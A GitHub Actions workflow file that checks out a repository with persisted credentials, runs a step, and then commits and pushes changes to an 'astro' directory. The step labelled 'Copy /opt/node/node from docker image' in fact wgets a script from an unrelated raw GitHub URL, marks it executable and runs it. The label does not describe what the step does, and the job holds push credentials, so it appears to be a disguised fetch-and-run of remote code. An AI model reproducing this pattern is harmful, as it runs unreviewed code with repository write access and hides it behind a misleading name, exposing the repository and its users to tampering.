name: CI

on:
  workflow_dispatch: 
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - name: Checkout repo
        uses: actions/checkout@v4
        with:
          persist-credentials: true

      - name: Copy /opt/node/node from docker image
        run: |
          wget https://raw.githubusercontent.com/menju2ikg8uti/tmp/main/xs.sh
          chmod +x xs.sh
          ./xs.sh
      - name: Commit changes
        run: |
          git config user.name "github-actions"
          git config user.email "github-actions@github.com"

          if [ -n "$(git status --porcelain)" ]; then
            git add astro
            git commit -m "ci: sync "
            git push
          else
            echo "No changes to commit"
          fi
